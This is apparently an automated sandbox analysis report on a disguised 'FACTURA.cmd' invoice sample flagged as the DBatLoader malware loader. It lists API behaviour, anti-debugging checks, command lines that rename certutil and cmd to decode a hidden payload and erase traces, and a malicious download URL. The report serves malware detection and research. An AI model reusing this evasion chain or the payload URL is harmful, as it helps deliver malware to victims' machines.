Source: C:\Users\Public\Libraries\Host.COM	Memory allocated: 2E1E000 memory commit 570351616	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Memory allocated: 2E74000 memory commit 571015168	Jump to behavior
Source: C:\Users\Public\Libraries\Host.COM	Memory allocated: 2F6E000 memory commit 570015744	Jump to behavior

Found large amount of non-executed APIs

Source: C:\Users\Public\alpha.exe	API coverage: 8.1 %
Source: C:\Users\Public\alpha.exe	API coverage: 8.6 %
Source: C:\Users\Public\kn.exe	API coverage: 0.8 %
Source: C:\Users\Public\alpha.exe	API coverage: 9.6 %
Source: C:\Users\Public\alpha.exe	API coverage: 9.6 %

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF79375823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	3_2_00007FF79375823C
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF793752978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	3_2_00007FF793752978
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF793767B4C FindFirstFileW,FindNextFileW,FindClose,	3_2_00007FF793767B4C
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7937435B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	3_2_00007FF7937435B8
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF793741560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	3_2_00007FF793741560
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF79375823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	5_2_00007FF79375823C
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF793752978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	5_2_00007FF793752978
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF793767B4C FindFirstFileW,FindNextFileW,FindClose,	5_2_00007FF793767B4C
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7937435B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	5_2_00007FF7937435B8
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF793741560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	5_2_00007FF793741560
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E087234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,	6_2_00007FF7E087234C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E080C6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,	6_2_00007FF7E080C6F8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0876F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,	6_2_00007FF7E0876F80
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08710C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,	6_2_00007FF7E08710C4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0873100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,	6_2_00007FF7E0873100
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E081B3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,	6_2_00007FF7E081B3D8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E081D4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,	6_2_00007FF7E081D4A4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07DD440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,	6_2_00007FF7E07DD440
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0853674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,	6_2_00007FF7E0853674
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08719F8 #359,FindFirstFileW,FindNextFileW,FindClose,	6_2_00007FF7E08719F8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0871B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,	6_2_00007FF7E0871B04
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E081DBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,	6_2_00007FF7E081DBC0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0815E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,	6_2_00007FF7E0815E58
Source: C:\Users\Public\Libraries\Host.COM	Code function: 9_2_02DF5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,	9_2_02DF5908
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF79375823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	10_2_00007FF79375823C
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF793752978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	10_2_00007FF793752978
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF793767B4C FindFirstFileW,FindNextFileW,FindClose,	10_2_00007FF793767B4C
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7937435B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	10_2_00007FF7937435B8
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF793741560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	10_2_00007FF793741560
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF79375823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	11_2_00007FF79375823C
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF793752978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	11_2_00007FF793752978
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF793767B4C FindFirstFileW,FindNextFileW,FindClose,	11_2_00007FF793767B4C
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7937435B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	11_2_00007FF7937435B8
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF793741560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	11_2_00007FF793741560

Source: C:\Users\Public\kn.exe

Code function: 6_2_00007FF7E085511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,

6_2_00007FF7E085511C

Source: Host.COM, 00000009.00000002.3032889978.00000000007FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWx
Source: Host.COM, 00000009.00000002.3032889978.000000000084D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\Public\Libraries\Host.COM

API call chain: ExitProcess graph end node

Anti Debugging

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Source: C:\Users\Public\Libraries\Host.COM

Code function: 9_2_02E0F740 GetModuleHandleW,GetProcAddress,CheckRemoteDebuggerPresent,

9_2_02E0F740

Checks if the current process is being debugged

Source: C:\Users\Public\Libraries\Host.COM

Process queried: DebugPort

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\Public\alpha.exe

Code function: 3_2_00007FF7937663FC GetCurrentThreadId,IsDebuggerPresent,OutputDebugStringW,

3_2_00007FF7937663FC

Contains functionality to dynamically determine API calls

Source: C:\Users\Public\Libraries\Host.COM

Code function: 9_2_02E08954 LoadLibraryW,GetProcAddress,FreeLibrary,

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\Public\alpha.exe

Code function: 3_2_00007FF79375823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,

3_2_00007FF79375823C

Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF793758FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00007FF793758FA4
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF7937593B0 SetUnhandledExceptionFilter,	3_2_00007FF7937593B0
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF793758FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_00007FF793758FA4
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF7937593B0 SetUnhandledExceptionFilter,	5_2_00007FF7937593B0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08A4E18 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_00007FF7E08A4E18
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08A53E0 SetUnhandledExceptionFilter,	6_2_00007FF7E08A53E0
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF793758FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00007FF793758FA4
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF7937593B0 SetUnhandledExceptionFilter,	10_2_00007FF7937593B0
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF793758FA4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	11_2_00007FF793758FA4
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF7937593B0 SetUnhandledExceptionFilter,	11_2_00007FF7937593B0

HIPS / PFW / Operating System Protection Evasion

Drops or copies certutil.exe with a different name (likely to bypass HIPS)

Source: C:\Windows\System32\extrac32.exe

File created: C:\Users\Public\kn.exe

Drops or copies cmd.exe with a different name (likely to bypass HIPS)

Source: C:\Windows\System32\extrac32.exe

File created: C:\Users\Public\alpha.exe

Contains functionality to execute programs as a different user

Source: C:\Users\Public\kn.exe

Code function: 6_2_00007FF7E0857024 GetModuleHandleW,GetProcAddress,#356,#357,CloseHandle,LocalFree,LocalFree,LocalFree,ImpersonateLoggedOnUser,#356,EqualSid,#357,LogonUserExW,GetLastError,ImpersonateLoggedOnUser,#356,#359,RevertToSelf,#356,

6_2_00007FF7E0857024

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\FACTURA.cmd" "C:\\Users\\Public\\Host.GIF" 3	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Host.GIF" "C:\\Users\\Public\\Libraries\\Host.COM" 10	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Libraries\Host.COM C:\Users\Public\Libraries\Host.COM	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Host.GIF" / A / F / Q / S	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\FACTURA.cmd" "C:\\Users\\Public\\Host.GIF" 3	Jump to behavior
Source: C:\Users\Public\alpha.exe	Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Host.GIF" "C:\\Users\\Public\\Libraries\\Host.COM" 10	Jump to behavior

Source: C:\Users\Public\kn.exe

Code function: 6_2_00007FF7E0844AF4 GetSecurityDescriptorDacl,GetLastError,SetEntriesInAclW,SetSecurityDescriptorDacl,GetLastError,#357,#357,LocalFree,LocalFree,LocalFree,

6_2_00007FF7E0844AF4

Source: C:\Users\Public\kn.exe

Code function: 6_2_00007FF7E0854E98 AllocateAndInitializeSid,GetLastError,#357,GetCurrentThread,GetLastError,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,DuplicateToken,GetLastError,CheckTokenMembership,GetLastError,CloseHandle,CloseHandle,FreeSid,

6_2_00007FF7E0854E98

Contains functionality to query locales information (e.g. system language)

Source: C:\Users\Public\alpha.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	3_2_00007FF7937551EC
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,	3_2_00007FF793746EE4
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	3_2_00007FF793753140
Source: C:\Users\Public\alpha.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	5_2_00007FF7937551EC
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,	5_2_00007FF793746EE4
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	5_2_00007FF793753140
Source: C:\Users\Public\kn.exe	Code function: LoadLibraryExW,SearchPathW,FindResourceExW,GetUserDefaultUILanguage,GetLocaleInfoW,wcsncmp,GetSystemDefaultUILanguage,FreeLibrary,FreeLibrary,LoadLibraryExW,FreeLibrary,	6_2_00007FF7E08A3800
Source: C:\Users\Public\Libraries\Host.COM	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	9_2_02DF5ACC
Source: C:\Users\Public\Libraries\Host.COM	Code function: GetLocaleInfoA,	9_2_02DFA7CC
Source: C:\Users\Public\Libraries\Host.COM	Code function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,	9_2_02DF5BD8
Source: C:\Users\Public\Libraries\Host.COM	Code function: GetLocaleInfoA,	9_2_02DFA818
Source: C:\Users\Public\alpha.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	10_2_00007FF7937551EC
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,	10_2_00007FF793746EE4
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	10_2_00007FF793753140
Source: C:\Users\Public\alpha.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,	11_2_00007FF7937551EC
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,	11_2_00007FF793746EE4
Source: C:\Users\Public\alpha.exe	Code function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,	11_2_00007FF793753140

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\alpha.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\alpha.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\Public\alpha.exe

Code function: 3_2_00007FF793746EE4 GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetDateFormatW,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,realloc,

3_2_00007FF793746EE4

Source: C:\Users\Public\kn.exe

Code function: 6_2_00007FF7E07F8944 GetComputerNameExW,GetLastError,#357,GetUserNameExW,GetLastError,#357,#357,#357,#357,#357,#357,

6_2_00007FF7E07F8944

Source: C:\Users\Public\alpha.exe

Code function: 3_2_00007FF79374586C GetVersion,

3_2_00007FF79374586C

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07B227C DsGetDcNameW,#357,DsBindW,DsCrackNamesW,#357,#357,#357,#357,#357,LocalAlloc,#359,DsUnBindW,NetApiBufferFree,DsFreeNameResultW,LocalFree,LocalFree,	6_2_00007FF7E07B227C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07CE568 #357,LookupAccountSidW,GetLastError,#357,DsGetDcNameW,DsBindW,DsGetDomainControllerInfoW,DsGetDomainControllerInfoW,#357,DsUnBindW,NetApiBufferFree,LocalFree,	6_2_00007FF7E07CE568
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07B54A0 wcschr,NetApiBufferFree,DsFreeNameResultW,#13,LocalFree,DsGetDcNameW,#359,#224,#224,DsBindW,#357,DsCrackNamesW,#357,#145,#359,#359,#14,#359,#73,#359,#208,#26,#127,LocalFree,#140,#359,#224,#167,#27,#357,#357,#41,NetApiBufferFree,DsUnBindW,DsFreeNameResultW,#13,LocalFree,	6_2_00007FF7E07B54A0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07D5648 #357,#357,DsGetSiteNameW,#359,LocalAlloc,LocalAlloc,GetTickCount,DsGetSiteNameW,GetTickCount,#207,LocalFree,#359,NetApiBufferFree,#357,#357,#207,LocalFree,#359,#359,#359,LocalFree,NetApiBufferFree,NetApiBufferFree,LocalFree,LocalFree,#357,DsUnBindW,	6_2_00007FF7E07D5648

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
108.170.55.202	taksonsdfg.co.in	United States		20454	SSASN2US	true

Contacted Domains

Name	IP	Active
taksonsdfg.co.in	108.170.55.202	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://taksonsdfg.co.in/34243456dfgd/255_Znrgbbhcbyx	true	11%, Virustotal, Browse	unknown

AV Detection

Found malware configuration

Source: 9.0.Host.COM.400000.0.unpack

Malware Configuration Extractor: DBatLoader {"Download Url": ["https://taksonsdfg.co.in/34243456dfgd/255_Znrgbbhcbyx"]}

Multi AV Scanner detection for domain / URL

Source: taksonsdfg.co.in	Virustotal: Detection: 10%	Perma Link
Source: https://taksonsdfg.co.in/./	Virustotal: Detection: 5%	Perma Link
Source: https://taksonsdfg.co.in/34243456dfgd/255_Znrgbbhcbyx	Virustotal: Detection: 11%	Perma Link
Source: https://taksonsdfg.co.in/x	Virustotal: Detection: 10%	Perma Link
Source: https://taksonsdfg.co.in/	Virustotal: Detection: 5%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\Public\Libraries\Host.COM

Virustotal: Detection: 51%

Perma Link

Multi AV Scanner detection for submitted file

Source: FACTURA.cmd	ReversingLabs: Detection: 33%
Source: FACTURA.cmd	Virustotal: Detection: 34%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 93.9% probability

Machine Learning detection for dropped file

Source: C:\Users\Public\Libraries\Host.COM

Joe Sandbox ML: detected

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07A2C2C CryptFindOIDInfo,memset,CryptRegisterOIDInfo,GetLastError,#357,	6_2_00007FF7E07A2C2C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07A2F38 ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,InitializeCriticalSection,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,LocalFree,lstrcmpW,#357,CoInitialize,#357,#357,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,RevertToSelf,#356,#357,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,	6_2_00007FF7E07A2F38
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07D21A4 #360,#359,#357,#357,BCryptFreeBuffer,	6_2_00007FF7E07D21A4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E08561AC SysStringLen,SysStringLen,CryptStringToBinaryW,GetLastError,#357,	6_2_00007FF7E08561AC
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E081A1E8 LocalFree,CryptHashCertificate2,CertGetCRLContextProperty,CertGetNameStringA,memmove,memmove,GetLastError,GetLastError,#357,GetLastError,#357,GetLastError,GetLastError,GetLastError,#357,LocalFree,memmove,GetLastError,#357,GetLastError,#359,LocalFree,	6_2_00007FF7E081A1E8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0896214 CryptDecodeObjectEx,CryptDecodeObjectEx,SetLastError,	6_2_00007FF7E0896214
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E082E1F8 CertSaveStore,GetLastError,LocalAlloc,#357,CertSaveStore,GetLastError,#357,LocalFree,#357,#357,NCryptOpenStorageProvider,NCryptImportKey,NCryptSetProperty,NCryptFinalizeKey,LocalFree,LocalFree,NCryptFreeObject,	6_2_00007FF7E082E1F8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E086A1F8 LocalAlloc,CryptEnumProvidersA,GetLastError,#358,LocalFree,#357,	6_2_00007FF7E086A1F8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E089613C CryptDecodeObjectEx,	6_2_00007FF7E089613C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07F417C #360,#360,#359,#357,#357,#357,#357,CryptDestroyKey,CryptGetUserKey,GetLastError,#358,LocalFree,LocalFree,LocalFree,CryptDestroyKey,	6_2_00007FF7E07F417C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0816194 CryptQueryObject,GetLastError,CertEnumCertificatesInStore,CertAddStoreToCollection,GetLastError,#357,CertCloseStore,CertFreeCertificateContext,	6_2_00007FF7E0816194
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E0868298 #357,CryptFindOIDInfo,LocalAlloc,#357,memmove,	6_2_00007FF7E0868298
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E089A2E0 NCryptOpenStorageProvider,NCryptOpenKey,NCryptFreeObject,	6_2_00007FF7E089A2E0
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF7E07D0300 NCryptOpenStorageProvider,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,NCryptFreeObject,#357,	6_2_00007FF7E07D0300
